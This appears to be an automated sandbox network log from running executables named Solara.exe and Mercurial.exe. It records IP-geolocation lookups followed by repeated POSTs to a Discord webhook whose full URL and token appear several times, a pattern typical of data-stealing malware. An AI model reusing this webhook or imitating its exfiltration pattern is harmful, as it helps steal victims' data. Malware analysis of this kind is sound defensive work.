discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.135.232
POST

https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

Mercurial.exe

Remote address:

162.159.137.232:443

Request

POST /api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 26
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Date: Tue, 17 Sep 2024 00:11:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=57a431ac748911efb2faae47ff38e562; Expires=Sun, 16-Sep-2029 00:11:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1726531871
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AhAKpkghf%2Fxvrd2LRS%2BzSR%2BnGVV%2BPs4Ega6SOBhbqksCw2C5bJsEc9huFJtguscgj0uXbhs%2BnC7cO%2Bf7EN4vDKAmwPKOK7B26bgSn3qtpL1%2FrH2jZJ48pyJmjrzM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=57a431ac748911efb2faae47ff38e562615817136c768608c46c88e15ed18fbd5517db2f6f608fb9c2ca4e3a93e952d3; Expires=Sun, 16-Sep-2029 00:11:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=011bbba8ad3150b6b2279d0f6d2b7ecd55acb513-1726531870; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=70GLOYhDinhuZOy_dgsLJ_CftvhYtjn5UZmllcdsYzA-1726531870194-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8c44e09b7a349498-LHR
DNS

232.137.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.137.159.162.in-addr.arpa

IN PTR

Response
DNS

33.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.135.221.88.in-addr.arpa

IN PTR

Response

33.135.221.88.in-addr.arpa

IN PTR

a88-221-135-33deploystaticakamaitechnologiescom
DNS

ip4.seeip.org

Solara.exe

Remote address:

8.8.8.8:53

Request

ip4.seeip.org

IN A

Response

ip4.seeip.org

IN A

23.128.64.141
DNS

ip-api.com

Solara.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com//json/

Solara.exe

Remote address:

208.95.112.1:80

Request

GET //json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 17 Sep 2024 00:11:44 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 311
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.138.232
POST

https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

Solara.exe

Remote address:

162.159.137.232:443

Request

POST /api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 446
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Date: Tue, 17 Sep 2024 00:11:45 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=6cca3ed2748911efba039ee05a178d61; Expires=Sun, 16-Sep-2029 00:11:45 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1726531906
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qN8ew6b%2BsnNnrlIlFRr8Ucznj7pC42HA0XICGB%2Fnpyi%2Bbml133pfBuk4KAY%2Bx3XbeNhadLXmvf2biG8tb0jGQZNu%2B49hKLdgqwNdbjtiKd17hJb3XKQZIAuO4NEI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=6cca3ed2748911efba039ee05a178d61c2135ce58d17fdccd41052d022ab90441b87c98b9c04dee5762388c2905916f3; Expires=Sun, 16-Sep-2029 00:11:45 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=5bc75ad7137b32dd864608d8b6115eb191abe2c1-1726531905; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=nfGZBXlTKJAj7Fa0fXhaxd4KhCognlEaRV72izozh9A-1726531905676-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8c44e1786a5576ed-LHR
POST

https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

Solara.exe

Remote address:

162.159.137.232:443

Request

POST /api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 315
Expect: 100-continue

Response

HTTP/1.1 204 No Content

Date: Tue, 17 Sep 2024 00:11:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=6d254d18748911ef86b406dde9b86b04; Expires=Sun, 16-Sep-2029 00:11:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1726531907
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pA0w2ru8N3icQgt3FHo6yoBHD6f16LixMOEAI6eff93O84nnwi%2BTRKGbJmer0s3KJO5nSL1yXMMY3AdMkzKbkofD2H0BXRKVWzXUUYMWJtuaVSAPEtLRj8QZmuh4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=6d254d18748911ef86b406dde9b86b04871d86f6b681b9962829c07e07cb445c1c6677f93f04b5e51698a81426e93107; Expires=Sun, 16-Sep-2029 00:11:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=39c00115d48a904ce8137f4e47351bdd7d9708ec-1726531906; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=6t3ihTJ2sbllO_pYMAFIVcvscVFRN8knRCFlD1Tt.Wk-1726531906274-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8c44e17b6bfa3691-LHR
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.134.233
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN Unknown

Response

cdn.discordapp.com

IN Unknown

h3h2��颟�颟�颟�颟��
DNS

233.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.135.159.162.in-addr.arpa

IN PTR

Response
DNS

34.209.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.209.17.2.in-addr.arpa

IN PTR

Response

34.209.17.2.in-addr.arpa

IN PTR

a2-17-209-34deploystaticakamaitechnologiescom
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.135.232
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN Unknown

Response

discord.com

IN Unknown

h3h2��颟�袟�袟�袟��
DNS

233.128.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.128.159.162.in-addr.arpa

IN PTR

Response
DNS

25.142.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.142.123.92.in-addr.arpa

IN PTR

Response

25.142.123.92.in-addr.arpa

IN PTR

a92-123-142-25deploystaticakamaitechnologiescom
POST

https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

Solara.exe

Remote address:

162.159.137.232:443

Request

POST /api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 196
Expect: 100-continue

Response

HTTP/1.1 204 No Content

Date: Tue, 17 Sep 2024 00:13:26 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=a9220c5c748911ef9f4e4a7e6b0bab68; Expires=Sun, 16-Sep-2029 00:13:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1726532008
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N9I8mpJ6F%2Fnyas6iQNSXG8D1kWuaAeV%2FzHETpoWYeYI3ysDrYcPEdbWb42LaOBM8yoh4wKvRfh%2BzvonU9ITaViet0tDngwWTFj0y83298WdpE2MVQbDI3uLkvN49"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=a9220c5c748911ef9f4e4a7e6b0bab6891ee596b50ee062b093cd909d4a094fb38d863123ca72846c0864f4a5f5cc21b; Expires=Sun, 16-Sep-2029 00:13:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=715f5b97ad9bbc4e36d4f5cbf34c8cc66f559efe-1726532006; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=uCfh7QN1oxlgE6WBz3Hif_NphtN3Ov1LNVtrs_nz0r8-1726532006914-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8c44e3f18eae6101-LHR
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.137.232
DNS

discord.com

Solara.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN Unknown

Response

discord.com

IN Unknown

h3h2��颟�袟�袟�袟��
DNS

232.136.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.136.159.162.in-addr.arpa

IN PTR

Response

20.26.156.215:443

github.com

tls

8.3kB
136.0kB
82
134
20.26.156.215:443

github.com

tls

2.2kB
4.1kB
9
10
13.107.6.158:443

business.bing.com

tls

3.9kB
10.1kB
19
22
88.221.134.17:443

bzib.nelreports.net

tls

3.3kB
6.2kB
22
22
185.199.111.133:443

avatars.githubusercontent.com

tls

4.0kB
10.0kB
32
36
185.199.109.154:443

github.githubassets.com

tls

41.6kB
1.0MB
607
884
185.199.109.154:443

github.githubassets.com

tls

2.3kB
4.7kB
10
11
185.199.109.154:443

github.githubassets.com

tls

2.3kB
4.7kB
10
11
185.199.109.154:443

github.githubassets.com

tls

2.3kB
4.7kB
10
10
185.199.109.154:443

github.githubassets.com

tls

2.3kB
4.7kB
10
10
185.199.109.154:443

github.githubassets.com

tls

2.2kB
4.7kB
10
11
185.199.111.133:443

user-images.githubusercontent.com

tls

128.5kB
4.9MB
2341
3538
172.165.61.93:443

nav-edge.smartscreen.microsoft.com

tls

19.0kB
19.6kB
51
51
140.82.112.22:443

collector.github.com

tls

8.2kB
7.5kB
27
26
185.199.109.154:443

github.githubassets.com

tls

4.4kB
23.7kB
41
43
20.26.156.210:443

api.github.com

tls

12.5kB
8.1kB
28
31
185.199.109.133:443

objects.githubusercontent.com

tls

117.1kB
4.8MB
2181
3470
172.165.69.228:443

dl-edge.smartscreen.microsoft.com

tls

11.2kB
13.2kB
31
31
13.87.96.169:443

app-edge.smartscreen.microsoft.com

tls

7.8kB
11.3kB
30
30
51.140.244.186:443

telem-edge.smartscreen.microsoft.com

tls

5.5kB
8.1kB
21
21
88.221.135.42:443

r.bing.com

tls

4.4kB
9.7kB
20
23
88.221.135.42:443

r.bing.com

tls

59.2kB
1.9MB
966
1408
88.221.135.27:443

th.bing.com

tls

7.9kB
18.6kB
38
42
88.221.135.27:443

th.bing.com

tls

2.3kB
5.3kB
11
14
20.190.159.64:443

login.microsoftonline.com

tls

4.3kB
7.5kB
13
14
13.107.5.80:443

services.bingapis.com

tls

4.0kB
9.8kB
18
25
204.79.197.200:443

www2.bing.com

tls

5.5kB
10.3kB
19
23
49.12.202.237:443

www.7-zip.org

tls

5.4kB
9.8kB
19
22
49.12.202.237:443

www.7-zip.org

tls

3.1kB
5.6kB
14
15
18.245.246.158:443

d3e54v103j8qbb.cloudfront.net

tls

4.2kB
39.6kB
40
45
172.64.155.119:443

geolocation.onetrust.com

tls

3.4kB
5.5kB
22
23
162.159.135.234:443

remote-auth-gateway.discord.gg

tls

4.0kB
6.7kB
17
20
162.159.136.234:443

gateway.discord.gg

tls

20.2kB
209.6kB
344
449
35.190.80.1:443

a.nel.cloudflare.com

tls

2.2kB
4.1kB
9
8
35.190.80.1:443

a.nel.cloudflare.com

tls

2.2kB
4.0kB
9
8
35.190.80.1:443

a.nel.cloudflare.com

tls

8.5kB
6.4kB
44
46
162.159.137.232:443

https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

tls, http

Mercurial.exe

1.0kB
4.9kB
10
11

HTTP Request

POST https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

HTTP Response

204
23.128.64.141:443

ip4.seeip.org

Solara.exe

260 B
5
208.95.112.1:80

http://ip-api.com//json/

http

Solara.exe

296 B
620 B
5
3

HTTP Request

GET http://ip-api.com//json/

HTTP Response

200
162.159.137.232:443

https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

tls, http

Solara.exe

1.4kB
4.9kB
10
10

HTTP Request

POST https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

HTTP Response

204
162.159.137.232:443

https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

tls, http

Solara.exe

1.4kB
2.1kB
8
8

HTTP Request

POST https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

HTTP Response

204
162.159.137.232:443

https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

tls, http

Solara.exe

1.3kB
2.2kB
8
9

HTTP Request

POST https://discord.com/api/webhooks/1285392429763264523/QhWtw3xWcKMVTCHdINs3FFspFoMN67-YFOYXhcQDKOh-KEQVm2gl37Orfly54K5uFJ0T

HTTP Response

204

8.8.8.8:53

github.com

dns

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

github.com

dns

56 B
121 B
1
1

DNS Request

github.com
8.8.8.8:53

github.com

dns

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

business.bing.com

dns

63 B
144 B
1
1

DNS Request

business.bing.com

DNS Response

13.107.6.158
8.8.8.8:53

business.bing.com

dns

63 B
171 B
1
1

DNS Request

business.bing.com
8.8.8.8:53

bzib.nelreports.net

dns

65 B
172 B
1
1

DNS Request

bzib.nelreports.net

DNS Response

88.221.134.17

88.221.135.81
8.8.8.8:53

bzib.nelreports.net

dns

65 B
204 B
1
1

DNS Request

bzib.nelreports.net
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

215.156.26.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

215.156.26.20.in-addr.arpa
8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

github.githubassets.com

dns

69 B
133 B
1
1

DNS Request

github.githubassets.com

DNS Response

185.199.109.154

185.199.108.154

185.199.111.154

185.199.110.154
8.8.8.8:53

github.githubassets.com

dns

69 B
151 B
1
1

DNS Request

github.githubassets.com
8.8.8.8:53

avatars.githubusercontent.com

dns

75 B
139 B
1
1

DNS Request

avatars.githubusercontent.com

DNS Response

185.199.111.133

185.199.109.133

185.199.110.133

185.199.108.133
8.8.8.8:53

avatars.githubusercontent.com

dns

75 B
140 B
1
1

DNS Request

avatars.githubusercontent.com
8.8.8.8:53

user-images.githubusercontent.com

dns

79 B
143 B
1
1

DNS Request

user-images.githubusercontent.com

DNS Response

185.199.111.133

185.199.110.133

185.199.108.133

185.199.109.133
8.8.8.8:53

user-images.githubusercontent.com

dns

79 B
144 B
1
1

DNS Request

user-images.githubusercontent.com
8.8.8.8:53

github-cloud.s3.amazonaws.com

dns

75 B
253 B
1
1

DNS Request

github-cloud.s3.amazonaws.com

DNS Response

16.182.70.233

52.216.42.129

3.5.9.154

3.5.20.102

16.182.41.49

3.5.25.213

52.217.130.25

16.182.108.209
8.8.8.8:53

github-cloud.s3.amazonaws.com

dns

75 B
203 B
1
1

DNS Request

github-cloud.s3.amazonaws.com
8.8.8.8:53

nav-edge.smartscreen.microsoft.com

dns

80 B
198 B
1
1

DNS Request

nav-edge.smartscreen.microsoft.com

DNS Response

172.165.61.93
8.8.8.8:53

nav-edge.smartscreen.microsoft.com

dns

80 B
242 B
1
1

DNS Request

nav-edge.smartscreen.microsoft.com
88.221.135.27:443

www.bing.com

https

98.6kB
1.8MB
480
2008
8.8.8.8:53

17.134.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

17.134.221.88.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

133.111.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.111.199.185.in-addr.arpa
8.8.8.8:53

154.109.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

154.109.199.185.in-addr.arpa
8.8.8.8:53

93.61.165.172.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

93.61.165.172.in-addr.arpa
8.8.8.8:53

27.135.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

27.135.221.88.in-addr.arpa
8.8.8.8:53

collector.github.com

dns

66 B
115 B
1
1

DNS Request

collector.github.com

DNS Response

140.82.112.22
8.8.8.8:53

collector.github.com

dns

66 B
164 B
1
1

DNS Request

collector.github.com
8.8.8.8:53

22.112.82.140.in-addr.arpa

dns

72 B
117 B
1
1

DNS Request

22.112.82.140.in-addr.arpa
8.8.8.8:53

api.github.com

dns

60 B
76 B
1
1

DNS Request

api.github.com

DNS Response

20.26.156.210
8.8.8.8:53

api.github.com

dns

60 B
125 B
1
1

DNS Request

api.github.com
8.8.8.8:53

210.156.26.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

210.156.26.20.in-addr.arpa
8.8.8.8:53

github.com

dns

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

github.com

dns

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

objects.githubusercontent.com

dns

75 B
139 B
1
1

DNS Request

objects.githubusercontent.com

DNS Response

185.199.109.133

185.199.110.133

185.199.111.133

185.199.108.133
8.8.8.8:53

objects.githubusercontent.com

dns

75 B
139 B
1
1

DNS Request

objects.githubusercontent.com

DNS Response

185.199.109.133

185.199.110.133

185.199.111.133

185.199.108.133
8.8.8.8:53

objects.githubusercontent.com

dns

75 B
157 B
1
1

DNS Request

objects.githubusercontent.com
8.8.8.8:53

dl-edge.smartscreen.microsoft.com

dns

79 B
197 B
1
1

DNS Request

dl-edge.smartscreen.microsoft.com

DNS Response

172.165.69.228
8.8.8.8:53

dl-edge.smartscreen.microsoft.com

dns

79 B
241 B
1
1

DNS Request

dl-edge.smartscreen.microsoft.com
224.0.0.251:5353

1.4kB
10
8.8.8.8:53

133.109.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.109.199.185.in-addr.arpa
8.8.8.8:53

app-edge.smartscreen.microsoft.com

dns

80 B
200 B
1
1

DNS Request

app-edge.smartscreen.microsoft.com

DNS Response

13.87.96.169
8.8.8.8:53

app-edge.smartscreen.microsoft.com

dns

80 B
244 B
1
1

DNS Request

app-edge.smartscreen.microsoft.com
8.8.8.8:53

169.96.87.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

169.96.87.13.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

telem-edge.smartscreen.microsoft.com

dns

82 B
199 B
1
1

DNS Request

telem-edge.smartscreen.microsoft.com

DNS Response

51.140.244.186
8.8.8.8:53

telem-edge.smartscreen.microsoft.com

dns

82 B
244 B
1
1

DNS Request

telem-edge.smartscreen.microsoft.com
8.8.8.8:53

r.bing.com

dns

56 B
268 B
1
1

DNS Request

r.bing.com

DNS Response

88.221.135.42

88.221.135.11

88.221.135.33

88.221.135.25

88.221.135.27

95.101.143.202
8.8.8.8:53

r.bing.com

dns

56 B
233 B
1
1

DNS Request

r.bing.com
8.8.8.8:53

th.bing.com

dns

57 B
286 B
1
1

DNS Request

th.bing.com

DNS Response

88.221.135.27

88.221.135.25

95.101.143.201

88.221.135.42

88.221.135.34

88.221.135.33

95.101.143.219
8.8.8.8:53

th.bing.com

dns

57 B
235 B
1
1

DNS Request

th.bing.com
8.8.8.8:53

186.244.140.51.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

186.244.140.51.in-addr.arpa
88.221.135.42:443

th.bing.com

https

16.2kB
195.5kB
81
202
8.8.8.8:53

login.microsoftonline.com

dns

71 B
314 B
1
1

DNS Request

login.microsoftonline.com

DNS Response

20.190.159.64

20.190.159.0

40.126.31.73

20.190.159.2

40.126.31.71

20.190.159.4

20.190.159.75

20.190.159.68
8.8.8.8:53

login.microsoftonline.com

dns

71 B
244 B
1
1

DNS Request

login.microsoftonline.com
8.8.8.8:53

login.microsoftonline.com

dns

71 B
306 B
1
1

DNS Request

login.microsoftonline.com

DNS Response

40.126.32.140

40.126.32.72

40.126.32.74

20.190.160.20

20.190.160.14

20.190.160.17

20.190.160.22

40.126.32.138
8.8.8.8:53

42.135.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

42.135.221.88.in-addr.arpa
8.8.8.8:53

64.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

64.159.190.20.in-addr.arpa
8.8.8.8:53

login.microsoftonline.com

dns

71 B
314 B
1
1

DNS Request

login.microsoftonline.com

DNS Response

20.190.159.2

40.126.31.67

20.190.159.4

20.190.159.73

20.190.159.75

20.190.159.0

20.190.159.64

20.190.159.68
8.8.8.8:53

services.bingapis.com

dns

67 B
152 B
1
1

DNS Request

services.bingapis.com

DNS Response

13.107.5.80
8.8.8.8:53

services.bingapis.com

dns

67 B
193 B
1
1

DNS Request

services.bingapis.com
8.8.8.8:53

80.5.107.13.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

80.5.107.13.in-addr.arpa
8.8.8.8:53

72.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

72.32.126.40.in-addr.arpa
8.8.8.8:53

www.7-zip.org

dns

59 B
75 B
1
1

DNS Request

www.7-zip.org

DNS Response

49.12.202.237
8.8.8.8:53

www.7-zip.org

dns

59 B
119 B
1
1

DNS Request

www.7-zip.org
8.8.8.8:53

www.7-zip.org

dns

59 B
75 B
1
1

DNS Request

www.7-zip.org

DNS Response

49.12.202.237
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

237.202.12.49.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

237.202.12.49.in-addr.arpa
8.8.8.8:53

www.7-zip.org

dns

59 B
75 B
1
1

DNS Request

www.7-zip.org

DNS Response

49.12.202.237
8.8.8.8:53

www.7-zip.org

dns

59 B
75 B
1
1

DNS Request

www.7-zip.org

DNS Response

49.12.202.237
8.8.8.8:53

github.com

dns

56 B
72 B
1
1

DNS Request

github.com

DNS Response

20.26.156.215
8.8.8.8:53

objects.githubusercontent.com

dns

75 B
139 B
1
1

DNS Request

objects.githubusercontent.com

DNS Response

185.199.110.133

185.199.109.133

185.199.111.133

185.199.108.133
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

217.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

217.135.221.88.in-addr.arpa
88.221.135.27:443

www.bing.com

https

7.1kB
7.1kB
34
32
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.135.232

162.159.138.232

162.159.128.233

162.159.137.232

162.159.136.232
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
106 B
1
1

DNS Request

discord.com
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.137.232

162.159.138.232

162.159.128.233

162.159.135.232

162.159.136.232
162.159.135.232:443

discord.com

https

515.2kB
10.8MB
1554
9472
8.8.8.8:53

cdn.prod.website-files.com

dns

72 B
104 B
1
1

DNS Request

cdn.prod.website-files.com

DNS Response

104.18.160.117

104.18.161.117
8.8.8.8:53

cdn.prod.website-files.com

dns

72 B
145 B
1
1

DNS Request

cdn.prod.website-files.com
8.8.8.8:53

ajax.googleapis.com

dns

65 B
81 B
1
1

DNS Request

ajax.googleapis.com

DNS Response

142.250.180.10
8.8.8.8:53

ajax.googleapis.com

dns

65 B
122 B
1
1

DNS Request

ajax.googleapis.com
